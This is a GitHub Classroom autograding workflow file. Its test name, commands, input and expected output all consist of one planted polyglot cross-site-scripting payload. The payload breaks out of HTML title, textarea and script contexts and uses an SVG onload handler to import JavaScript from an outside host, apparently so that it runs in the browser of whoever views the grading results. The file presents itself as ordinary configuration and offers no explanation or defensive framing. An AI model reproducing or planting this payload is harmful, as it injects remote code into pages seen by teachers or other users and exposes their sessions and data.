name: Autograding Tests
'on':
- push
- repository_dispatch
permissions:
  checks: write
  actions: read
  contents: read
jobs:
  run-autograding-tests:
    runs-on: ubuntu-latest
    if: github.actor != 'github-classroom[bot]'
    steps:
    - name: Checkout code
      uses: actions/checkout@v4
    - name: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000'
      id: title-textarea-script-svg-onload-import-1-i0s-ca-s-0000
      uses: classroom-resources/autograding-io-grader@v1
      with:
        test-name: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000'
        setup-command: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000'
        command: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000'
        input: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000

          '
        expected-output: '```'';"//></title></textarea></script><svg/onload=import(''//1.i0s.ca'')><s>0000

          '
        comparison-method: contains
        timeout: 10
        max-score: 100
    - name: Autograding Reporter
      uses: classroom-resources/autograding-grading-reporter@v1
      env:
        TITLE-TEXTAREA-SCRIPT-SVG-ONLOAD-IMPORT-1-I0S-CA-S-0000_RESULTS: "${{steps.title-textarea-script-svg-onload-import-1-i0s-ca-s-0000.outputs.result}}"
      with:
        runners: title-textarea-script-svg-onload-import-1-i0s-ca-s-0000
